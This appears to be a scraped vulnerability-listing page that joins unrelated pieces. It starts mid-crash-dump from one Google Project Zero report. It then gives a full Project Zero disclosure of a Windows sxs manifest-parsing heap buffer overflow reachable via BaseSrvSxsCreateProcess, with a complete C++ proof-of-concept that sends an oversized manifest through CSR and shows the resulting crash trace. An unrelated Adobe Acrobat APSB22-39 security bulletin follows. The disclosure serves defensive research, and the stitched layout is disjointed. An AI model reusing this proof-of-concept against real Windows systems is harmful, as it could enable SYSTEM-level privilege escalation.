sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x818000000bd`41a3f160 00007ffb`d2fb6490 : 00000222`3d0d0750 00000000`000000f0 00000222`4785ef30 00000222`3a877f80 : sxssrv!BaseSrvSxsCreateActivationContextFromMessage+0x32e000000bd`41a3f2d0 00007ffb`d598265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0000000bd`41a3f970 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f```## CREDIT INFORMATIONSergei Glazunov of Google Project Zero**This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-07-19.**Related CVE Numbers: CVE-2022-22049,CVE-2022-22049.Found by: glazunov@google.com

Windows sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString Heap Buffer Overflow

**Windows sxs!CNodeFactory::XMLParser\_Element\_doc\_assembly\_assemblyIdentity Heap Buffer Overflow**

    Windows: Heap buffer overflow in sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity## SUMMARYA heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.## VULNERABILITY DETAILSIn 2020, Project Zero reported a heap buffer overflow in application manifest parsing[1]. The `MaximumLength` field in one of the `UNICODE_STRING` parameters of the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine wasn't properly validated, and was later used by `XMLParser_Element_doc_assembly_assemblyIdentity` as the maximum size of a `memcpy` destination buffer. The fix added an extra `CsrValidateMessageBuffer` call to `BaseSrvSxsCreateActivationContextFromMessage`.We've just discovered that `BaseSrvSxsCreateActivationContextFromMessage` is not the only CSR routine that can reach `XMLParser_Element_doc_assembly_assemblyIdentity`. An attacker can trigger the same buffer overflow via `BaseSrvSxsCreateProcess`.1. https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2020/CVE-2020-1027.html## VERSIONWindows 11 12H2 (OS Build 22000.593)Windows 10 12H2 (OS Build 19044.1586)## REPRODUCTION CASE1) Enable page heap verification for csrss.exe:```gflags /p /enable csrss.exe /full```2) Restart the machine.3) Compile and run:```#pragma comment(lib, "ntdll")#include <windows.h>#include <winternl.h>#include <cstdint>#include <cstdio>#include <string>typedef struct _SECTION_IMAGE_INFORMATION {  PVOID EntryPoint;  ULONG StackZeroBits;  ULONG StackReserved;  ULONG StackCommit;  ULONG ImageSubsystem;  WORD SubSystemVersionLow;  WORD SubSystemVersionHigh;  ULONG Unknown1;  ULONG ImageCharacteristics;  ULONG ImageMachineType;  ULONG Unknown2[3];} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;typedef struct _RTL_USER_PROCESS_INFORMATION {  ULONG Size;  HANDLE ProcessHandle;  HANDLE ThreadHandle;  CLIENT_ID ClientId;  SECTION_IMAGE_INFORMATION ImageInformation;  BYTE Unknown1[128];} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;NTSTATUS(NTAPI* RtlCreateProcessParameters)(PRTL_USER_PROCESS_PARAMETERS*, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PVOID, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING);NTSTATUS(NTAPI* RtlCreateUserProcess)(PUNICODE_STRING, ULONG, PRTL_USER_PROCESS_PARAMETERS, PSECURITY_DESCRIPTOR, PSECURITY_DESCRIPTOR, HANDLE, BOOLEAN, HANDLE, HANDLE, PRTL_USER_PROCESS_INFORMATION);PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);void CaptureString(LPVOID capture_buffer,                   uint8_t* msg_field,                   PCWSTR string,                   size_t length = 0) {  if (length == 0)    length = lstrlenW(string);  CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,                          length * 2 + 2, (PSTR)msg_field);}int main() {  HMODULE ntdll = LoadLibrary(L"ntdll");#define INIT_PROC(name) \  name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));  INIT_PROC(RtlCreateProcessParameters);  INIT_PROC(RtlCreateUserProcess);  INIT_PROC(CsrAllocateCaptureBuffer);  INIT_PROC(CsrFreeCaptureBuffer);  INIT_PROC(CsrClientCallServer);  INIT_PROC(CsrCaptureMessageString);  UNICODE_STRING image_path;  PRTL_USER_PROCESS_PARAMETERS proc_params;  RTL_USER_PROCESS_INFORMATION proc_info = {0};  RtlInitUnicodeString(&image_path, L"\\SystemRoot\\notepad.exe");  RtlCreateProcessParameters(&proc_params, &image_path, NULL, NULL, NULL, NULL,                             NULL, NULL, NULL, NULL);  RtlCreateUserProcess(&image_path, OBJ_CASE_INSENSITIVE, proc_params, NULL,                       NULL, NULL, FALSE, NULL, NULL, &proc_info);  const size_t HEADER_SIZE = 0x40;  uint8_t msg[HEADER_SIZE + 0x1f8] = {0};#define FIELD(n) msg + HEADER_SIZE + 8 * n#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;  SET_FIELD(2, proc_info.ClientId.UniqueProcess);  SET_FIELD(3, proc_info.ClientId.UniqueThread);  SET_FIELD(4, -1);  SET_FIELD(7, 1);  SET_FIELD(8, 0x20000);  std::string manifest =      "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' "      "manifestVersion='1.0'>"      "<assemblyIdentity name='@' version='1.0.0.0'/>"      "</assembly>";  manifest.replace(manifest.find('@'), 1, 0x4000, 'A');  SET_FIELD(13, manifest.c_str());  SET_FIELD(14, manifest.size());  PVOID capture_buffer = CsrAllocateCaptureBuffer(6, 0x200);  CaptureString(capture_buffer, FIELD(22), L"C:\\Windows\\");  CaptureString(capture_buffer, FIELD(24), L"\x00\x00", 2);  CaptureString(capture_buffer, FIELD(28), L"A");  SET_FIELD(28, 0xff000002);  CsrClientCallServer(msg, capture_buffer, 0x1001001d,                      sizeof(msg) - HEADER_SIZE);}```The crash should look like to the following:```CONTEXT:  0000007c4afbcfc0 -- (.cxr 0x7c4afbcfc0)rax=0000020e6515ce00 rbx=0000000000004000 rcx=0000020e6515d010rdx=fffffffffbe741fa rsi=0000020e652c48c0 rdi=0000000000000001rip=00007ff825a53c53 rsp=0000007c4afbdd38 rbp=0000007c4afbde80 r8=0000000000000032  r9=00000000000001f7 r10=00007ff822e6b558r11=0000020e60fd8ffc r12=0000020e66d1cf80 r13=0000000000000001r14=0000000000000000 r15=0000000000000005iopl=0         nv up ei pl nz na pe nccs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202ntdll!memcpy+0x113:0033:00007ff8`25a53c53 0f2941f0        movaps  xmmword ptr [rcx-10h],xmm0 ds:002b:0000020e`6515d000=????????????????????????????????Resetting default scopeWRITE_ADDRESS:  0000020e6515d000EXCEPTION_RECORD:  0000007c4afbd4b0 -- (.exr 0x7c4afbd4b0)ExceptionAddress: 00007ff825a53c53 (ntdll!memcpy+0x0000000000000113)   ExceptionCode: c0000005 (Access violation)  ExceptionFlags: 00000000NumberParameters: 2   Parameter[0]: 0000000000000001   Parameter[1]: 0000020e6515d000Attempt to write to address 0000020e6515d000STACK_TEXT:0000007c`4afbdd38 00007ff8`22df5a41 : 0000020e`652c48c0 00000000`00000001 00000000`00000001 00000000`00000001 : ntdll!memcpy+0x1130000007c`4afbdd40 00007ff8`22e07b94 : 00007ff8`00000000 00000000`000000a8 0000020e`652c48c0 0000020e`652c48c0 : sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity+0x4c10000007c`4afbe3c0 00007ff8`22e1f406 : 0000020e`652e7f20 0000020e`652e7f20 00000000`00000000 00000000`00000000 : sxs!CNodeFactory::CreateNode+0xd340000007c`4afbe7d0 00007ff8`22df8a33 : 0000020e`00000000 0000020e`652a8cc8 00000000`00000000 0000020e`65166e20 : sxs!XMLParser::Run+0x8d60000007c`4afbe8f0 00007ff8`22df7468 : 0000020e`00000000 0000020e`6527ac90 00000000`00000000 0000020e`6527ac90 : sxs!SxspIncorporateAssembly+0x5130000007c`4afbeab0 00007ff8`22df7cf6 : 00000000`00000000 00000000`00000000 0000020e`6527ac90 0000020e`65167720 : sxs!SxspIncorporateAssembly+0x1040000007c`4afbeb60 00007ff8`22df3769 : 0000007c`00000000 0000007c`4afbefa0 00000000`00000000 0000020e`65166e20 : sxs!SxspCloseManifestGraph+0xbe0000007c`4afbec00 00007ff8`22fb3eed : 00000000`00000000 00000000`00000000 00000000`00000000 0000007c`4afbf3a0 : sxs!SxsGenerateActivationContext+0x3390000007c`4afbed60 00007ff8`22fb2405 : 0000007c`4afbf1f0 000004f7`0000000b 00000000`00000000 00000000`00000001 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x6ed0000007c`4afbf1a0 00007ff8`22fb1e91 : 0000020e`56e00000 00000000`01080002 00000000`00000264 00000000`00000270 : sxssrv!InternalSxsCreateProcess+0x5450000007c`4afbf680 00007ff8`230133c3 : 00000000`00000000 0000007c`4afbf789 00000000`00000000 00000000`00000000 : sxssrv!BaseSrvSxsCreateProcess+0x710000007c`4afbf6c0 00007ff8`23036490 : 0000020e`ffffffff 0000007c`4afbf848 0000020e`00000000 0000020e`00000001 : basesrv!BaseSrvCreateProcess2+0x1f30000007c`4afbf7f0 00007ff8`25a0265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d00000007c`4afbfe90 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f```## CREDIT INFORMATIONSergei Glazunov of Google Project ZeroRelated CVE Numbers: CVE-2020-1027,CVE-2022-22026,CVE-2022-22026.Found by: glazunov@google.com

Windows sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity Heap Buffer Overflow

Adobe Acrobat Reader versions 22.001.20169 (and earlier), 20.005.30362 (and earlier) and 17.012.30249 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader  | APSB22-39

**Bulletin ID**

**Date Published**

**Priority**

APSB22-39

August 9, 2022

2

**Summary**

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.                     

**Affected Versions**

**Product**

**Track**

**Affected Versions**

**Platform**

Acrobat DC 

Continuous 

22.001.20169 and earlier versions

Windows &  macOS

Acrobat Reader DC

Continuous 

22.001.20169 and earlier versions  

Windows & macOS

Acrobat 2020  

Classic 2020             

20.005.30362 and earlier versions

Windows & macOS  

Acrobat Reader 2020  

Classic 2020             

20.005.30362 and earlier versions  

Windows & macOS  

Acrobat 2017

Classic 2017

17.012.30249 and earlier versions    

Windows & macOS  

Acrobat Reader 2017

Classic 2017

17.012.30249 and earlier versions    

Windows & macOS  

For questions regarding Acrobat DC, please visit the Acrobat DC FAQ page. 

**Solution**

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Product**

**Track**

**Updated Versions**

**Platform**

**Priority Rating**

**Availability**

Acrobat DC

Continuous

22.002.20191  

Windows and macOS

2

Release Notes     

Acrobat Reader DC

Continuous

22.002.20191  

Windows and macOS

2

Release Notes     

Acrobat 2020  

Classic 2020             

20.005.30381  

Windows  and macOS    

2

Release Notes     

Acrobat Reader 2020  

Classic 2020   

20.005.30381  

Windows  and macOS   

2

Release Notes   

Acrobat 2017

Classic 2017

17.012.30262  

Windows and macOS

2

Release Notes     

Acrobat Reader 2017

Classic 2017

17.012.30262  

Windows and macOS

2

Release Notes     

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**

CVSS vector

**CVE Number**

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35665  

Improper Input Validation (CWE-20)  

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35666  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35667  

Improper Input Validation (CWE-20)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-35668  

Use After Free (CWE-416)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-35670  

Out-of-bounds Read (CWE-125)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-35671  

Out-of-bounds Read (CWE-125)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-35678  

**Acknowledgements**

Adobe would like to thank the following for reporting these issues and for working with Adobe to help protect our customers:   

*   Kai Lu of Zscaler's ThreatLabz - CVE-2022-35665, CVE-2022-35666, CVE-2022-35668, CVE-2022-35670  
    
*   Anonymous working with Trend Micro Zero Day Initiative - CVE-2022-35667  
    
*   Rocco Calvi (@TecR0c) working with Trend Micro Zero Day Initiative - CVE-2022-35671
*   kdot working with Trend Micro Zero Day Initiative - CVE-2022-35678

**Revisions:**

July 26, 2022: Added CVE details for CVE-2022-35669

May 9th, 2022: Added CVE details for CVE-2022-28837, CVE-2022-28838

April 18, 2022: Updated acknowledgement for CVE-2022-24102, CVE-2022-24103, CVE-2022-24104  

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

Tag

#ssh